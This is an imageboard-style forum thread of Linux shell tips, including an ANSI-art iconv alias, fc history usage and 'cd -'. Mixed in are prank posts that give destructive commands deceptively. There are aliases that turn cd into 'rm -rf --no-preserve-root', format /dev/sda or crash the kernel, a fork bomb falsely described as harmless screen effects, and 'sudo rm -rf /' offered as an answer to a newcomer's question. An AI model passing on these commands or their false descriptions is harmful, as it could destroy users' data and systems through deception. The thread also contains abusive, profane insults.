Ok here's a shell alias to display DOS ANSI art. alias kat='iconv -c -f CP437 -t utf-8' You need to set LC_CTYPE=en_US.UTF-8 or other utf-8 locale. Also need a unicode font. I use these Xresources for xterm: *VT100*faceName: DejaVu Sans Mono*VT100*faceSize: 14 But it's a lot of trouble to go through, compared to just using VGA font.
Ryder Myers
This is now a tuxpepe thread.
Samuel Garcia
Jaxon Thomas
Jonathan Fisher
Hudson Garcia
Nathan Hughes
yolo() { # Kill a random process. kill -9 "$(pgrep . | shuf -n 1)"}
Lincoln Parker
Wheres that russian roulette script someone made?
James Lopez
# Bad aliases. alias cd='rm -rf --no-preserve-root' alias cleanup-disc='mkfs.ext3 /dev/sda' alias cleanup-home='mv ~ /dev/null' alias cleanup-kernel='echo c > /proc/sysrq-trigger' alias cleanup-ram='cat /dev/zero > /dev/mem' alias matrix=':(){ :|: & };:' alias system-info='cat /dev/port'
play -n -n --combine merge synth pinknoise band -n 1200 1800 tremolo 50 10 tremolo 0.14 70 tremolo 0.2 50
ocean beach sound
Christian Martinez
wat do?
Carson Reed
sudo rm -rf / --no-preserve-root
Matthew Reyes
does it work on a macOS?
Samuel Reyes
:(){ :|:& };: makes your terminal display a bunch of random characters like in the 1337 haxxor movies
James Sanders
now you've fucking done it unleashed the fucking beast I'm going to hack you so fucking hard your grandma is going to have to reboot her computer. I have over 250 confirmed hacks and hacked the lunar lander you have nothing on me skiddy get the fuck out before I push in your shit bitch.
not like it would be hard to hack Holla Forums
Robert Gutierrez
Use fc instead of history or $HISTTIMEFORMAT will break it. Example: fc -l 1 | perl6 -e 'say lines».words»[1].Bag.sort(-*.value).head(10)'
Asher Phillips
very nice
William Morales
Ryan Cox
i never bothered to learn the command line for linux nor am i very active in linux community. which isnt bad because i dont really need to be
Austin Miller
Thanks for teaching me fc. fc -s as alias is useful as fuck.
Grayson Thomas
awk --copyleft | wc -c
Isaac Ortiz
Get the fuck off tech or at the very least get some Gnu/Loonix
Jaxon Brooks
cd -
Returns you to the directory you were just working in. Simple as hell, but surprisingly nice when you quickly cd away out of habit, and don't feel like typing the whole path in again.
Hunter Allen
wtf, how did I not know this? I have a new favrite command now.